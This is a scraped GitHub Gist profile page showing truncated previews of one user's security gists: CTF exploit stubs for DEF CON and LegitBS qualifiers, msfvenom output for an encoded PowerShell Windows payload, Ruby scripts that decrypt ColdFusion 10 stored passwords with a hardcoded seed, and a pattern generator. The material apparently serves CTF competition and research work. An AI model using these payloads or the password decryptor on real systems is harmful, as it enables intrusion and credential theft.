Skip to content

Instantly share code, notes, and snippets.


Ditmar Wendt dwendt

Block or report user

Report or block dwendt

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
dwendt /
Last active May 14, 2018
dc18 quals, all the good parts of this code belong to jeffball
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode =
def p32(v):
return struct.pack(">i",v)
View welp.txt
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/powershell_base64
cmd/powershell_base64 succeeded with size 333 (iteration=0)
cmd/powershell_base64 chosen with final size 333
Payload size: 333 bytes
Final size of psh file: 2374 bytes
$NHEpDZWJXk = @"
View coldfusion10decrypt.rb
require 'openssl'
require 'base64'
require 'rexml/document'
include REXML
# pull this from
SEED = 'EB3452127614E25A'
def decrypt(cpass)
View coldfusion10decrypt.rb
require 'openssl'
require 'base64'
SEED = 'EB3452127614E25A'
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="]
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="
def decrypt(cpass)

Keybase proof

I hereby claim:

  • I am dwendt on github.
  • I am dwn ( on keybase.
  • I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao

To claim this, I am signing this object:

dwendt / gist:c25895fde82730b8f17f
Created Mar 25, 2016
SunCTF scores that CTFTime won't accept
View gist:c25895fde82730b8f17f
"standings": [
"id": 393,
"pos": 1,
"score": 1905,
"team": "eipiplus1equals0"
"id": 135,
dwendt /
Created Jul 16, 2015

LegitBS Quals 2015 - thing2 (4pts)

For this pwnable we've got a zip with AppJailLauncher.exe and thing2.exe. This means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr ruby solution

Prerequisite Knowledge

  • C++ Object Memory Layout (Virtual Function Tables)
  • Windows 64bit ABI / Calling Convention
  • ROP
View gist:5cc5223d4686d0e33209
memoArr = {};
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset
function deBruijn (charset, maxlen, n) {
var k = charset.length;
var a = [];
for (var i = 0; i < k * n; i++) a.push(0);
if (maxlen.toString() in memoArr)
return memoArr[maxlen.toString()];
for (var k in memoArr) {
dwendt / thing2.exe.rb
Created Jun 10, 2015
thing2.exe - legitbs defcon quals 2015 - 4pt pwnable
View thing2.exe.rb
#!/usr/bin/env ruby
require 'socket'
#require 'hexdump'
$dbg = false
$sock ="localhost", 4141)
def recv_until(str)
data = ""
while tmp = $sock.recv(1024) and not tmp.empty?
You can’t perform that action at this time.